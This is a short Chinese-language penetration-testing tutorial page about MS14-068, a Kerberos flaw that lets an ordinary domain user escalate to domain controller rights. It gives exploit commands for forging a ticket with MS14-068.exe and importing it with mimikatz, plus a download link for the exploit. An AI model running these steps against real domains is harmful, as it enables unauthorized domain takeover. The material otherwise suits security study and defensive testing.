menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 005-4.2.5 MS14-068 chevron_right 001-4.2.5 MS14-068.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-4.2.5 MS14-068.md
    1.01 KB / 2021-07-17 00:01:42
        ### 4.2.5 MS14-068

MS14-068 是一个能够使普通用户提权获取域控权限的权限提升漏洞,微软给出的补丁 是 kb3011780。在 server 2000 以上的域控中,只要没打这个补丁,都有可能被利用。

* 1、 尝试直接访问域控的 C 盘

![](images/yushentou/15899762666872.png)


* 2、使用 ms14-068 的 exp,生成票据

```bash
C:\Users\jeff1\Desktop>MS14-068.exe -u [email protected] -s S-1-5-21-3418659180-3 421952656-1938706522-1109 -d 192.168.19.100 -p test@124

```

![](images/yushentou/15899762773517.png)


* 3、 使用 mimilatz 导入生成的 ccache 文件,导入之前 cmd 下使用命令 klist purge 或者在 mimikatz 中使用 kerberos::purge 删除当前缓存的 kerberos 票据

![](images/yushentou/15899762857192.png)


导入票据:

```bash
kerberos::ptc [email protected]

```

![](images/yushentou/15899762930327.png)


4、 再次访问域控

![](images/yushentou/15899763004220.png)


MS14-068 下载地址:

https://github.com/ianxtianxt/MS14-068
    links
    file_download